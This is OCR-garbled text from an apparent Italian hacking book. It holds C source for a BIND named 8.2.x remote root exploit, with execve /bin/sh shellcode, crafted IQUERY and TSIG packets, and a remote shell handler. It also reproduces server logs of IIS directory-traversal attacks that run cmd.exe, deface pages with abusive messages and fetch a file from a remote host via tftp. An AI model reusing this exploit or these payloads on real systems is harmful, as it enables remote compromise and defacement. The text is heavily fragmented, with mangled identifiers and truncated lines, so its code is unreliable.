\xcd\x80" /* int $0x80 */ // 2 - 35 
\xb0\x3f" /* movb $0x3 f, %al */ // 2 - 37 
\x41" /* incl %ecx */ // 1 - 38 
\xcd\x80" /* int $0x80 */ // 2 - 40 




\x41" /* incl %ecx *///!- 43 
\xcd\x80" /* int $0x80 */ // 2 - 45 
/* execve() */ 
\x88\x56\x07" /* movb %dl, 0x07 (%esi) 
\x89\x76\x0c" /* movi %esi, OxOc (%esi) 
\x87\xf3" /* xchgl %esi, %ebx */ // 2 ■ 
\x8d\x4b\x0c" /* leal OxOc (%ebx) , %ecx */ 
\xbO\xOb" /* movb $OxOb, %al */ // 2 - 58 
\xcd\x80" /* int $0x80 */ // 2 - 60 
\x90" 
/* callz: */ 
\xe8\x72\xff\xff\xff" /* cali start */ // 5 - 5 
/bin/sh"; /* There's a NUL at the end here */ // 8 - 13 
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long res; 

struct hostent* he; 



if (! (he = ge 
return (0); 



} 

return (res) ; 

} 

_l il i dumpbuf (char *buff, Int len) 

{ 

char line [17]; 
int x; 

/* print out a pretty hex dump */ 
for (x=0; x<len; x++) { 
if(! (x%16) && x) { 
line [16] = 0; 



print f ("%02X ", (unsigned char)buff[x] 
if (isprint ( (unsigned char) buff [x] ) ) 




char buff [1024]; 
int fmax, ret; 
fd_set fds; 

fmax = max (fileno (stdin) , sockd) + 1; 
send(sockd, "uname -a; id;\n", 15, 0) ; 
for (;;) 

{ 

FD_ZERO(&fds) ; 

FD_SET (fileno (stdin) , &fds) ; 

FD_SET ( sockd, &fds) ; 

if (select (fmax, 6 fds, NULL, NULL, ì 

{ 



} 

if (FD_ISSET (sockd, &fds) ) 
{ 

bzero (buff, sizeof buff) ; 
if((ret = recv (sockd, buf 
{ 




{ 
} 



(stderr, "Connection closed\n") ; 



} 

if(FL 
{ 



bzero (buff, sizeof buff) ; 

ret = read( fileno (stdin) , buff, sizeof buff, 

if (send (sockd, buff, ret, 0) != ret) 

{ 

f print f (stderr, "Transmission loss\n") ; 
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} 

} 

} 

connection (struct sockaddr_in host) 
{ 

int sockd; 

host . s±n_port = htons (36864) ; 
printf("[*] connecting . . \n" ) ; 
usleep (2000) ; 




printf (" [*] wait for your shell. . \n") ; 
usleep (500) ; 



runshell (sockd) ; 

} 

else 
{ 

printf ("[k] errori named not vulnerable or wrong offsets used\n") ; 




{ 



HEADER* hdr; 

int n, k; 

char* ptr; 

int qry_space = 12; 

int dummy_names = 7; 

int evil_size = Oxff; 

memset (buff, 0, BUFFSIZE) ; 



hdr 


= (HEADER*) buff ; 


hdr- 


->id = htons (Oxbeef) ; 


hdr- 


->opcode = IQUERY; 


hdr- 


->rd = 1; 


hdr- 


■>ra = 1; 


hdr- 


->qdcount = htons (0) ; 


hdr- 


->nscount = htons (0) ; 


hdr- 


->ancount = htons (1) ; 


hdr- 


->arcount = htons (0) ; 



ptr = buff + sizeof (HEADER) ; 

printf ("[d] HEADER is %d long\n" , sizeof (HEADER) ) ; 
n = 62; 



{ 

*ptr++ = n; 
ptr += n; 
} 

ptr += 1; 

PUTSHORT (T_A, ptr); /* class 
PUTL0NG(1, ptr); /* ttl */ 
PUTSHORT (evil_size, ptr); /* our 
return (ptr - buff + qry_space) ; 

int evil_query (char* buff, int offset) 

{ 

j- iì i lameaddr, shelladdr, rroffsetidx, i 

HEADER* hdr; 

char *ptr; 

int k, bufflen; 

u_int n, m; 

u_short s; 

int i; 

int shelloff, shellstarted, shelldone; 
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Int towrlte, ourpack; 
int n_dummy_rrs = 7; 

prlntf (" [d] evil_query(buff, %08x)\n", offset); 

prlntf (" [d] shellcode is %d long\n" , sizeof (shellcode) ) ; 

shelladdr = offset - 0x200; 

lameaddr = shelladdr + 0x300; 
ourpack = offset - 0x250 + 2; 
towrlte = (offset & ~Oxff) - ourpack - 6; 

prlntf (" [d] olb = %d\n", (unslgned char) (offset & Oxff)); 

rroffsetldx = towrlte / 70; 

offsetO = towrlte - rroffsetldx * 70; 

± 

prlntf (" [x] could not wrlte our data in buffe 
rroffsetldx=%d)\n" r offsetO, rroffsetldx); 
return (-1) ; 
} 

rrshellidx = 1; 
deplshellcode = 2; 
hdr = (HEADER*) buff; 
memset (buff, 0, BUFFSIZE) ; 
/* complete the header */ 



hdr->opcode = 
hdr->rd = 1; 
hdr->ra = 1; 

hdr->qdcount = htons (n_dummy_rrs) , 
hdr->ancount = htons (0); 
hdr->arcount = htons (1) ; 
ptr = buff + slzeot 
shellstarted = 0; 
shelldone = 0; 
shelloff = 0; 
n = 63; 



{ 

*ptr++ = (char)n; 



t 

± rrs e 2. j. ep s e co 

prlntf (" [*] injecting shellcode at %d\n", 
shellstarted = 1; 

} 

if ((k == rroffsetldx) && (1 == offsetO)) 

*ptr++ = lameaddr & OxOOOOOOff; 



*ptr++ = 


(lameaddr 


& 


OxOOOOffOO) 


» 


8; 


*ptr++ = 


(lameaddr 


& 


OxOOffOOOO) 


» 


16; 


*ptr++ = 


(lameaddr 


& 


OxffOOOOOO) 


» 


24; 



*ptr++ = shelladdr & OxOOOOOOff; 
*ptr++ = (shelladdr & OxOOOOffOO) » 8; 

*ptr++ = (shelladdr & OxffOOOOOO) » 24; 



*ptr++ 




argevdlspl & OxOOOOOOff; 






*ptr++ 




(argevdlspl & OxOOOOffOO) 


» 


8; 


*ptr++ 




(argevdlspl & OxOOffOOOO) 


» 


16; 


*ptr++ 




(argevdlspl & OxffOOOOOO) 






*ptr++ 




argevdlsp2 & OxOOOOOOff; 






*ptr++ 




(argevdisp2 & OxOOOOffOO) 


» 


8; 


*ptr++ 




(argevdlsp2 & OxOOffOOOO) 


» 


16; 


*ptr++ 




(argevdlsp2 & OxffOOOOOO) 


» 


24; 



} 
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*ptr++ = shellcode [shelloff++] ; 

if (shelloff == (slzeof (shellcode) ) ) 



> 
} 



/* OK: 



* 


NAME field, 


the QTYPE field, and the QCLASS field. 


* 


We have to 


have the shellcode skip over these bytes, 


* 


as well as 


the leading 0x3 f (63) byte for the next 


* 


NAME field. 


We do that by putting a jmp instruction 



* h 
*/ 




/* For alignment 


reasons, we need to stick an extra 




*/ 


m = 2; 










} 

else 




{ 




*ptr++ = 0x07; 




} 





/* End the NAME with a compressed pointer . Note that it 's 

* not clear that the value used, CO 00, is legai (it 

* points to the beginning of the packet) , but BIND 

apparently 

* treats such things as name terminators , anyway. 
*/ 

*ptr++ = OxcO; /*NS_CMPRSFLGS*/ 



ptr += 4; /* QTYPE, QCLASS */ 
} 

/* Now we make the TSIG AR */ 
*ptr++ = 0x00; /* Empty name */ 



bufflen = ptr - buff; 

// duiapbuf (buff , bufflen); 

return (bufflen) ; 
} 

long xtract_offset(char* buff, int len 
long ret; 



/* 


Here 


be dragons . 


*/ 


/* 


(But 


seriously, 
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V 

ret = *( (long*) Sbuff [0x214]) ; 
argevdlspl = 0x080d7cd0; 
argevdlsp2 = * ( (long*) Sbuff [0x264] ) ; 
prlntf("[d] argevdlspl = %08x, argevt 
argevdlspl, argevdisp2) ; 

// dumpbuf(buff, lezi); 



struct socka 
Int sock; 
long address; 
char buff[BZ 
int len, 1; 
long offset; 
socklen_t reclen; 



printer [*] named 8.2.x (< 8.2. 3-REL) remote root exploit by lucysoft, 
lx\n"); 

prlntf (" [*] flxed by ian@cypherpunks.ca and jwilkins@bitland. net\n\n" ) ; 
address = 0; 



return (-1) ; 



printf (" [x] unable to resolve %s, try using an IP address\n", argv[l]) ; 
return (-1) ; 
} else { 

zaezacpy (foo, Saddress, 4); 

printf("[*] attacking %s (%d. %d. %d. %d) \n" , argv[l] , foo[0] , foo[l] , foo[2] , 



sa . sin_family = AF_INET; 



7 



len = infoleak_qry (buff) ; 

printf (" [d] infoleak_qry was %d long\n", len); 

len = sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof(sa)); 



{ 



printf (" [*] unable to send iquery\n") ; 
reclen = sizeof (sa) ; 



len = recvfro. 
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{ 

prlntf (" [x] unable to recelve Iquery answer\n") ; 



> 



offset = xtract_offset (buff, len) ; 



len = ev±l_query (buff , offset); 
lf(len < 0) { 

prlntf ("[x] error sendlng tsig packet\n") ; 




} 



I f iles di log di attacchi hacker 

Dall'analisi dei files di log relativi ad attacchi hackers portati avanti su dei sistemi di aziende 
italiane è possibile vedere i metodi usati per attivare i vari software come ad esempio TFTP. 
I files di LOG sono relativi a server FTP e server WEB. 

21:13:53 62.243.121.193 [4]USER anonymous 331 

21:13:53 62.243.121.193 [4]PASS anonymous@on.the.net 230 

21:13:57 62.243.121.193 [4]sent /200k 550 

21:13:57 62.243.121.193 [4]created 200k 550 

21:14:03 62.243.121.193 [4]sent /images/- [-+01000+-] - 550 

21:14:03 62.243.121.193 [4]created -[-+01000+-]- 550 

21:14:08 62.243.121.193 [4]QUIT - 226 

^Software: Microsoft Internet Information Services 5.0 
#Version: 1.0 

#Date: 2002-01-11 22:01:08 



#Fields: 


time c- 


-ip 


cs-method cs-uri-stem sc-status 


22: 


01. 


■08 


213. 


10. 


.221 


.106 


[1] USER anonymous 331 


22: 


01. 


■08 


213. 


10. 


.221 


.106 


[1JPASS anonymous@on.the.net 230 


22: 


01. 


■32 


213. 


10. 


.221 


.106 


[l]sent / 'images /=++l+mb++= 550 


22: 


01. 


■32 


213. 


10. 


.221 


. 106 


[l]created =++l+mb++= 550 


22: 


01. 


■38 


213. 


10. 


.221 


.106 


[ljsent / images /_notes/=++l+mb++= 550 


22: 


01. 


■38 


213. 


10. 


.221 


.106 


[l]created =++l+mb++= 550 


22: 


01. 


■49 


213. 


10. 


.221 


.106 


[l]sent /=++l+mb++= 550 


22: 


01. 


■49 


213. 


10. 


.221 


.106 


[l]created =++l+mb++= 550 


22: 


01. 


■56 


213. 


10. 


.221 


.106 


[l]sent /Drop/=++l+mb++= 550 


22: 


01. 


■56 


213. 


10. 


.221 


.106 


[ljcreated =++l+mb++= 550 


22: 


02. 


■04 


213. 


10. 


.221 


.106 


[1 ]MKD j 550 


22: 


02. 


■10 


213. 


10. 


.221 


.106 


[l]sent /Pickup/=++l+mb++= 550 


22: 


02. 


■10 


213. 


10. 


.221 


.106 


[l]created =++l+mb++= 550 


22: 


02. 


■21 


213. 


10. 


.221 


.106 


[l]sent /pages/=++l+mb++= 550 


22: 


02. 


■21 


213. 


10. 


.221 


.106 


[l]created =++l+mb++= 550 


22: 


02. 


■26 


213. 


10. 


.221 


.106 


[ljsent /pages/namerica/=++l+mb++= 550 


22: 


02. 


■26 


213. 


10. 


.221 


.106 


[l]created =++l+mb++= 550 
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22 


02 


32 


213 


10 


221 


106 


[l]sent /pages/meast/=++l+mb++= 550 


22 


02 


32 


213 


10 


221 


106 


[l]created =++l+mb++= 550 


22 


02 


40 


213 


10 


221 


106 


[l]sent /pages/ europe /=++l+mb++= 550 


22 


02 


40 


213 


10 


221 


106 


[1] createci =++l+mb++= 550 


22 


02 


47 


213 


10 


221 


106 


[l]sent /pages/l/=++l+mb++= 550 


22 


02 


47 


213 


10 


221 


106 


[1] createci =++l+mb++= 550 


22 


02 


55 


213 


10 


221 


106 


[ljsent /pages / 'africa/ '=++l+mb++= 550 


22 


02 


55 


213 


10 


221 


106 


[1] createci =++l+mb++= 550 


22 


03 


02 


213 


10 


221 


106 


[ljsent /images/=++l+mb++= 550 


22 


03 


02 


213 


10 


221 


106 


[1] createci =++l+mb++= 550 


22 


03 


10 


213 


10 


221 


106 


[ljsent /Drop/=++l+mb++= 550 


22 


03 


10 


213 


10 


221 


106 


[1] createci =++l+mb++= 550 


22 


03 


18 


213 


10 


221 


106 


[l]sent /Badmail/=++l+mb++= 550 


22 


03 


18 


213 


10 


221 


106 


[1] createci =++l+mb++= 550 


22 


03 


25 


213 


10 


221 


106 


[1JQUIT -257 


22 


16 


04 


213 


10 


221 


106 


[2] USER anonymous 331 


22 


16 


04 


213 


10 


221 


106 


[2] PASS anonymous@on.the.net 230 


22 


16 


18 


213 


10 


221 


106 


[2]QUIT -257 



^Software: Microsoft Internet Information Services 5.0 
#Version: 1.0 

#Date: 2001-12-13 00:00:15 

#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem 
cs-uri-query sc-status cs (User-Agent) 

2001-12-13 01:22:38 202.99.176.28 - 217 .57 .163.98 80 GET 
/scripts/ ../.. /winnt/ 'system32Zcmd.exe /c+dir 200 - 

2001-12-13 01:22:38 202.99.176.28 - 217 . 57 . 163 . 98 80 GET 
/scripts/ ../.. /winnt/ 'system32Zcmd.exe /c+dir + ..\ 200 - 

2001-12-13 01:22:40 202.99.176.28 - 217 .57 .163.98 80 GET 
/scripts/ . ./. . /winnt/ system32Zcmd.exe 
/c+copy+\winnt\system32\cmd.exe+root .exe 502 - 

2001-12-13 01:22:40 202.99.176.28 - 217 .57 .163 . 98 80 GET 
/ scripts/ root . exe 

Zc+echo+*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br* 
>*<br*>*<table+width%3D100%*>*<td*>*<p+align%3D%22center%22*>''<font+s 
ize%3D7+color%3Dred A >fuck+USA+Government A </font*> A <tr*>*<td*>*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcnQyahoo . com. cn*</html*>> ../. /index . asp 502 - 

2001-12-13 01:22:46 202.99.176.28 - 217 .57 .163 . 98 80 GET 
/scripts/root . exe 

/c+echo+^<html^>^<body+bgcolor%3Dblack^> A <br^>^<br A > A <br^>^<br A > A <br A 
>*<br*>*<table+width%3D100%*> A <td*>*<p+align%3D%22center%22 A >*<font+s 
ize%3D7+color%3Dred*>fuck+USA+Government*</font*>*<tr*>*<td*>*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcn@yahoo . com. cn*</html*>> ../. /index . htm 502 - 

2001-12-13 01:22:50 202.99.176.28 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe 

/c+echo+*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br A - 
>*<br*>*<table+width%3D100%*>*<td*>*<p+align%3D%22center%22*>*<font+s 
ize%3D7+color%3Dred A >fuck+USA+Government A </font*> A <tr*>*<td A >*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcn@yahoo . com. cn*</html*>> ../. /de fault . asp 502 - 

2001-12-13 01:22:54 202.99.176.28 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



/c+echo+*<html A >*<body+bgcolor%3Dblack*>*<br A >*<br*> A <br*>*<br A > A <br* 
>*<br*>*<table+width%3D100%*> A <td*>*<p+align%3D%22center%22*>*<font+s 
ize%3D7+color%3Dred*>fuck+USA+Government*</font*>*<tr*>*<td*>*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonBOx*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcn@yahoo . corti. cn*</html*>> ../. /de fault .htm 502 - 

2001-12-13 01:23:00 202.99.176.28 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe 

/c+echo+*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*- 
>*<br / ">*<table+width%3D100%*>*<td A > A <p+align%3D%22center%22*> A <font+s 
ize%3D7+color%3Dred*>fuck+USA+Government *</font A > *<tr*>*<td*>*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonBOx*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcnQyahoo . com. cn*</html*>> ../.. /index . asp 502 - 

2001-12-13 01:23:04 202.99.176.28 - 217 .57 .163 .98 80 GET 
/scripts/root . exe 

/c+echo+*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br* 
>*<br*>*<table+width%3D100%*> A <td*>*<p+align%3D%22center%22*>*<font+s 
ize%3D7+color%3Dred*>fuck+USA+Government A </font*> A <tr*>*<td A >*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcn@yahoo . com. cn*</html*» ../.. /index .htm 502 - 

2001-12-13 01:23:04 202.99.176.28 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe 

/c+echo+^<html^>^<body+bgcolor%3Dblack^> A <br^> A <br^> A <br^>^<br A >^<br^ 
>*<br*> / *<table+width%3D100%*>*<td*>*<p+align%3D%22center%22 A >*<font+s 
ize%3D7+color%3Dred A >fuck+USA+Government A </font*> A <tr*>*<td*>*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcnQyahoo . com. cn*</html*>> ../.. /de fault . asp 502 - 

2001-12-13 01:23:06 202.99.176.28 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe 

/c+echo+*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*- 
>*<br*>*<table+width%3D100%*>*<td*>*<p+align%3D%22center%22*>*<font+s 
ize%3D7+color%3Dred*>fuck+USA+Government*</font*>*<tr*>*<td*>*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcnQyahoo . com. cn*</html*>> ../.. /default .htm 502 - 

2001-12-13 01:23:14 202.99.176.28 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe 

/c+echo+*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br* 
>*<br*>*<table+width%3D100%*>*<td*>*<p+align%3D%22center%22''>*<font+s 
ize%3D7+color%3Dred A >fuck+USA+Government A </font*> A <tr*>*<td*>*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcnQyahoo . com. cn*</html*» .. /AdminScripts/ index . asp 502 - 

2001 -1 2-13 01 :23:1 4 202.99.1 76.28 - 21 7.57.1 63.98 80 GET /scripts/root.exe 

/c+echo+ A <html A > A <body+bgcolor%3Dblack A > A <br A > A <br A > A <br A > A <br A > A <br A > A <br A > A <tabl 

e+width%3D100% A > A <td A > A <p+align%3D%22center%22 A > A <font+size%3D7+color%3Dred A 

>fuck+USA+Government A </font A > A <tr A > A <td A > A <p+align%3D%22center%22 A > A <font+size% 

3D7+color%3Dred A >fuck+PoizonBOx A <tr A > A <td A > A <p+align%3D%22center%22 A > A <font+siz 

e%3D4+color%3Dred A >contact:sysadmcn@yahoo.com.cn A </html A >>../AdminScripts/index.ht 

m 502 - 
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2001-12-13 01:23:16 202.99.176.28 - 217.57.163.98 80 GET 
/scripts/root . exe 

/c+echo+*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*- 
>*<br*> / *<table+width%3D100%*>*<td*>*<p+align%3D%22center%22 A >*<font+s 
ize%3D7+color%3Dred*>fuck+USA+Government*</font*>*<tr*>*<td*>*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonBOx*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcn@yahoo . com. cn*</html*>> .. /AdminScripts/de fault . asp 5 02 - 

2001-12-13 01:23:20 202.99.176.28 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe 

/c+echo+*<html *>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*- 
>*<br*>*<table+width%3D100%*>*<td*>*<p+align%3D%22center%22*>*<font+s 
ize%3D7+color%3Dred*>fuck+USA+Government*</font*>''<tr*>*<td''>*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcn@yahoo . com . cn *</html A » . . /AdminScripts/de fault . htm 502 - 

2001-12-13 01:23:24 202.99.176.28 - 217 .57 .163.98 80 GET 
/scripts/root . exe 

/c+echo+*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br A - 
>*<br*>*<table+width%3D100%*> A <td*>*<p+align%3D%22center%22*>*<font+s 
ize%3D7+color%3Dred A >fuck+USA+Government A </font*> A <tr*>*<td*>*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
td*>*<p+align%3D%22center%22 A > A <font+size%3D4+color%3Dred*>contact : sy 
sadmcn@yahoo . com. cn*</html*» ../ ftproot/ index . asp 502 - 

2001-12-13 01:23:29 202.99.176.28 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe 

/c+echo+*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*- 
>*<br*>*<table+width%3D100%*>*<td*>*<p+align%3D%22center%22*>''<font+s 
ize%3D7+color%3Dred*>fuck+USA+Government*</font*>*<tr*>*<td*>*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcnQyahoo . com . cn *</html A » . . / ftproot/ index . htm 502 - 

2001-12-13 01:23:29 202.99.176.28 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe 

/c+echo+*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br* 
>*<br / ">*<table+width%3D100%*>*<td A > A <p+align%3D%22center%22*> A <font+s 
ize%3D7+color%3Dred*>fuck+USA+Government*</font*>*<tr*>*<td*>''<p+alig 
n%3D%22center%22*> A <font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcnQyahoo . com. cn*</html*» ../ ftproot /default . asp 502 - 

2001-12-13 01:23:43 202.99.176.28 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe 

/c+echo+^<html^>^<body+bgcolor%3Dblack^> A <br^>^<br *>*<br*>*<br*>*<br*- 
>*<br*>*<table+width%3D100%*>*<td*>*<p+align%3D%22center%22 A >*<font+s 
ize%3D7+color%3Dred A >fuck+USA+Government A </font*> A <tr*>*<td A >*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
td*>*<p+align%3D%22center%22*> *<font+size%3D4+color%3Dred*>contact : sy 
sadmcnQyahoo . com. cn*</html*» ../ ftproot /default .htm 502 - 

2001-12-13 01:23:48 202.99.176.28 - 217 . 57 . 163 . 98 80 GET 
/ script s/ . ./. . /winnt/ 'system32Zcmd.exe 
/c+copy+\winnt\system32\cmd.exe+root .exe 502 - 

2001-12-13 01:23:48 202.99.176.28 - 217 . 57 .163 . 98 80 GET 
/scripts/root . exe 

/c+echo+*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br A - 
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>*<br A >*<table+width%3D100%*>*<td A > A <p+align%3D%22center%22*> A <font+s 
ize%3D7+color%3Dred A >fuck+USA+Government *</font *> A <tr*>*<t d*>*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonBOx*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcn@yah.oo . coiti. cn*</html*>> .. /iissamples /index . asp 502 - 

2001-12-13 01:23:53 202.99.176.28 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe 

/c+echo+*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br A - 
>*<br*>*<table+width%3D100%*> A <td*>*<p+align%3D%22center%22*>*<font+s 
ize%3D7+color%3Dred*>fuck+USA+Government*</font*>*<tr*>*<td*>''<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcn@yah.oo . corti. cn*</html*>> .. /iissamples/ index . htm 502 - 
2001-12-13 01:23:57 202.99.176.28 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe 

/c+echo+*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br* 
>*<br*>*<table+width%3D100%*> A <td*>*<p+align%3D%22center%22 A >*<font+s 
ize%3D7+color%3Dred*>fuck+USA+Government*</font*>*<tr*>*<td*>*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcn@yahoo . com. cn*</html*>> .. /iissamples /de fault . asp 502 - 

2001-12-13 01:23:57 202.99.176.28 - 217 . 57 .163 . 98 80 GET 
/scripts/root . exe 

/c+echo+^<html^>^<body+bgcolor%3Dblack^> A <br A > A <br^>^<br A >^<br^> A <br^ 
>*<br*>*<table+width%3D100% / *>'-<td*>*<p+align%3D%22center%22'->''<font+s 
ize%3D7+color%3Dred A >fuck+USA+Government A </font*> A <tr*>*<td*>*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact:sy 
sadmcn@yahoo . com. cn*</html*» .. /iissamples /de fault .htm 502 - 

2001-12-13 01:24:02 202.99.176.28 - 217 . 57 . 163 . 98 80 GET 
/ script s/ . ./. . /winnt/system32/cmd.exe 
/c+copy+\winnt\system32\cmd.exe+root .exe 502 - 

2001-12-13 01:24:02 202.99.176.28 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe 

/c+echo+*<html*>''<body+bgcolor%3Dblack*>*<br*>''<br*>*<br*>*<br*>*<br* 
>*<br*>*<table+width%3D100%*>*<td A > A <p+align%3D%22center%22*> A <font+s 
ize%3D7+color%3Dred A >fuck+USA+Government *</font*> A <tr*>*<td A >*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcnQyahoo . com . cn *</html A » . . /mai lroot/ index . asp 502 - 

2001-12-13 01:24:07 202.99.176.28 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe 

/c+echo+*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br A - 
>*<br*>*<table+width%3D100%*>*<td*>*<p+align%3D%22center%22 A >*<font+s 
ize%3D7+color%3Dred*>fuck+USA+Government*</font*>*<tr*>*<td*>*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcnQyahoo . com. cn*</html*>> . . /mailroot/ index .htm 502 - 

2001-12-13 01:24:07 202.99.176.28 - 217 .57 .163.98 80 GET 
/scripts/root . exe 

/c+echo+*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br A - 
>*<br*>*<table+width%3D100%*> A <td*>*<p+align%3D%22center%22 A >*<font+s 
ize%3D7+color%3Dred*>fuck+USA+Government*</font*>*<tr*>*<td*>*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
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td A > A <p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact : sy 
sadmcnQyahoo . com. cn*</html*>> .. /mailroot/de fault . asp 502 - 

2001-12-13 01:24:12 202.99.176.28 - 217.57.163.98 80 GET 
/scripts/root . exe 

/c+echo+*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br* 
>*<br*>*<table+width%3D100%*> A <td*>*<p+align%3D%22center%22*>*<font+s 
ize%3D7+color%3Dred*>fuck+USA+Government*</font*>*<tr*>*<td*>*<p+alig 
n%3D%22center%22*>*<font+size%3D7+color%3Dred*>fuck+PoizonB0x*<tr*>*< 
td*>*<p+align%3D%22center%22*>*<font+size%3D4+color%3Dred*>contact :sy 
sadmcn@yahoo . com. cn*</html*>> .. /mailroot/de fault . htm 502 - 

2001-12-13 01:24:12 202.99.176.28 - 217 . 57 . 163 . 98 80 GET 
/ script s/ . ./. . /winnt/system32/cmd.exe 
/c+copy+\winnt\system32\cmd.exe+root .exe 502 - 
2001-12-13 01:37:23 217 .57 .79.187 - 217 .57 .163.98 80 GET 
/scripts/root . exe /c+dir 200 - 

2001-12-13 01:39:12 217 .57 .79 .187 - 217 . 57 .163 . 98 80 GET 
/scripts/root . exe /c+dir 200 - 

2001-12-13 01:40:06 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/scripts/root .exe /c+tftp%20- 

i%20217.57.79.187%20GET%20Admin.dll%20Admin.dll 502 - 

